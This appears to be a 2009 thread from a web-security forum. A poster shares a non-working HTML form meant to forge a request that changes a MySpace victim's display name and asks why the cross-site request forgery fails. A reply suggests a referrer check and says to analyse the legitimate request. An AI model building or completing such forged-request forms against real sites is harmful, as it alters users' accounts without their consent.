Paid Advertising is
ha.ckers sla.cking
Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For Session, fixations, hijacking, lockout, replay, session riding etc.... 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Myspace .. maybe..CSRF on it??
Posted by: XaDoS
Date: August 28, 2009 11:40AM

Hello guys!
I discovered one day ago with my friend 3 CSRF on netlog and now i will see for myspace.. it's difficult I know, because there are some captcha, token and other protection but..
I want ask you why it's impossible change user_name of victim??
I try with a easy html code for try, but don't work.. and I will know the motivation of it.


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "">
<html xmlns="">
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<form name="XaDoS" action="" method="post">
<td class="SubSettingsListValue">
<input name="ctl00$ctl00$cpMain$cpMain$ContactInfo$DisplayName" value="[NICKNAME]" maxlength="50" size="40" id="ctl00_ctl00_cpMain_cpMain_ContactInfo_DisplayName" type="text">
<input name="ctl00$ctl00$cpMain$cpMain$ContactInfo$FirstName" value="[NAME]" size="40" id="ctl00_ctl00_cpMain_cpMain_ContactInfo_FirstName" type="text">
<td class="SubSettingsListValue">
<input name="ctl00$ctl00$cpMain$cpMain$ContactInfo$btnSaveLocation" value="Salva modifiche" onclick='if(!Page_ClientValidate()) return showErrorMessage();WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions("ctl00$ctl00$cpMain$cpMain$ContactInfo$btnSaveLocation", "", true, "", "", false, false))' id="ctl00_ctl00_cpMain_cpMain_ContactInfo_btnSaveLocation" type="submit">


[NICKNAME] = the nickname for the victim user ;
[NAMW] = the name for the victim user ;

So.. where are the problems??
thanks a lot in advance for your time


Options: ReplyQuote
Re: Myspace .. maybe..CSRF on it??
Posted by: PaPPy
Date: August 28, 2009 02:41PM

maybe the check the page referral?
try capturing the data that is used when you legitimatly change your name on myspace and analyze it

Options: ReplyQuote

Sorry, only registered users may post in this forum.